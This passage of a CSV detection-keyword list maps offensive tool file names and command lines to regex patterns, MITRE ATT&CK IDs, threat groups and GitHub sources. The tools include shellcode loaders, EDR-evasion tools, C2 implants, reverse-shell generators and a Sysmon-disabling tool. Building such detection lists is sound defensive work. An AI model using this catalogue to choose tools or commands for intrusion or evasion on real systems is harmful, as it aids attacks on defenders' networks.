Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","N/A","10","10","20","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z","59336"
"*shellcodeCrypter-bin.py*",".{0,1000}shellcodeCrypter\-bin\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59337"
"*shellcodeCrypter-msfvenom.py*",".{0,1000}shellcodeCrypter\-msfvenom\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","59338"
"*Shellcode-Download_CreateThread_Execution*",".{0,1000}Shellcode\-Download_CreateThread_Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1105 - T1055.001 - T1027 - T1203 - T1071","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","N/A","3","246","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z","59339"
"*Shellcode-Downloader-CreateThread-Execution*",".{0,1000}Shellcode\-Downloader\-CreateThread\-Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1105 - T1055.001 - T1027 - T1203 - T1071","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","N/A","3","246","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z","59340"
"*shellcodeEncryptDecrypt*",".{0,1000}shellcodeEncryptDecrypt.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59341"
"*shellcode-exec.ps1*",".{0,1000}shellcode\-exec\.ps1.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","59342"
"*shellcodeexec.x32*",".{0,1000}shellcodeexec\.x32.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","59343"
"*shellcodeexec.x64*",".{0,1000}shellcodeexec\.x64.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","59344"
"*ShellcodeFluctuation.*",".{0,1000}ShellcodeFluctuation\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59345"
"*ShellcodeFluctuation64*",".{0,1000}ShellcodeFluctuation64.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59346"
"*ShellcodeFluctuation86*",".{0,1000}ShellcodeFluctuation86.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","N/A","10","10","1012","160","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z","59347"
"*Shellcode-Hide-main*",".{0,1000}Shellcode\-Hide\-main.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","59348"
"*shellcodeInjection.json*",".{0,1000}shellcodeInjection\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","59349"
"*Shellcode-Loader-master*",".{0,1000}Shellcode\-Loader\-master.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","59350"
"*ShellcodeRDI.*",".{0,1000}ShellcodeRDI\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1620 - T1055.001 - T1059.004 - T1027 - T1105","TA0005 - TA0004 - TA0002","N/A","N/A","Resource Development","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","N/A","10","2262","473","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z","59351"
"*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","59352"
"*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59353"
"*shellcode-runner.py*",".{0,1000}shellcode\-runner\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1059.001 - T1209 - T1105 - T1547 - T1027","TA0003 - TA0005 - TA0002 - TA0011","N/A","N/A","Persistence","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","1","4","0","2023-02-23T00:05:57Z","2021-06-16T20:20:55Z","59354"
"*ShellcodeTemplate.x64.bin*",".{0,1000}ShellcodeTemplate\.x64\.bin.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","N/A","10","1","23","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z","59355"
"*shellcodetester *",".{0,1000}shellcodetester\s.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59356"
"*ShellCodeTester.csproj*",".{0,1000}ShellCodeTester\.csproj.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59357"
"*shellcodetester.exe*",".{0,1000}shellcodetester\.exe.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59358"
"*shellcodetester.git*",".{0,1000}shellcodetester\.git.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59359"
"*shellcodetester.sh*",".{0,1000}shellcodetester\.sh.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59360"
"*ShellCodeTester.sln*",".{0,1000}ShellCodeTester\.sln.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Resource Development","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","N/A","1","92","30","2024-11-06T00:48:22Z","2019-06-11T04:39:58Z","59361"
"*shellerator --reverse-shell --lhost * --lport * --type *",".{0,1000}shellerator\s\-\-reverse\-shell\s\-\-lhost\s.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-type\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59362"
"*ShellGen powershell.exe -ep bypass ",".{0,1000}ShellGen\spowershell\.exe\s\-ep\sbypass\s","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","59363"
"*ShellGen -x64 -B64PwshCommand *",".{0,1000}ShellGen\s\-x64\s\-B64PwshCommand\s.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","59364"
"*ShellGen -x64 -CmdCommand *",".{0,1000}ShellGen\s\-x64\s\-CmdCommand\s.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","59365"
"*ShellGen -x64 -PwshCommand *",".{0,1000}ShellGen\s\-x64\s\-PwshCommand\s.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","59366"
"*ShellGhost.dll",".{0,1000}ShellGhost\.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59367"
"*ShellGhost.exe*",".{0,1000}ShellGhost\.exe.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59368"
"*ShellGhost.sln*",".{0,1000}ShellGhost\.sln.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59369"
"*ShellGhost.vcxproj*",".{0,1000}ShellGhost\.vcxproj.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59370"
"*ShellGhost_mapping.py*",".{0,1000}ShellGhost_mapping\.py.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59371"
"*ShellGhost-master.zip*",".{0,1000}ShellGhost\-master\.zip.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","N/A","10","1175","140","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z","59372"
"*ShellProfilePersistence.json*",".{0,1000}ShellProfilePersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","59373"
"*ShellPwnsh.exe*",".{0,1000}ShellPwnsh\.exe.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","59374"
"*ShellPwnsh.go*",".{0,1000}ShellPwnsh\.go.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","1","N/A","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","59375"
"*shellster/LDAPPER*",".{0,1000}shellster\/LDAPPER.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","59376"
"*shellter.exe*",".{0,1000}shellter\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59377"
"*shepardsbind_recv.py*",".{0,1000}shepardsbind_recv\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59378"
"*shepbind_serv.exe*",".{0,1000}shepbind_serv\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59379"
"*Sherlock.ps1*",".{0,1000}Sherlock\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","59380"
"*sherlock.ps1*",".{0,1000}sherlock\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","59381"
"*Sherlock_Vulns.txt*",".{0,1000}Sherlock_Vulns\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","59382"
"*Shhhavoc.py *",".{0,1000}Shhhavoc\.py\s.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","59383"
"*Shhhloader.py*",".{0,1000}Shhhloader\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","59384"
"*Shhhloader-main\*",".{0,1000}Shhhloader\-main\\.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","N/A","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","59385"
"*Shhmon.csproj*",".{0,1000}Shhmon\.csproj.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","59386"
"*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59387"
"*Shhmon.exe*",".{0,1000}Shhmon\.exe.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","59388"
"*Shhmon.git*",".{0,1000}Shhmon\.git.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","N/A","3","228","37","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z","59389"
"*SHIM me what you got - Manipulating Shim and Office for Code Injection*",".{0,1000}SHIM\sme\swhat\syou\sgot\s\-\sManipulating\sShim\sand\sOffice\sfor\sCode\sInjection.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","59390"
"*shinject *",".{0,1000}shinject\s.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59391"
"*shinject.nim*",".{0,1000}shinject\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","59392"
"*shinject_ex *",".{0,1000}shinject_ex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59393"
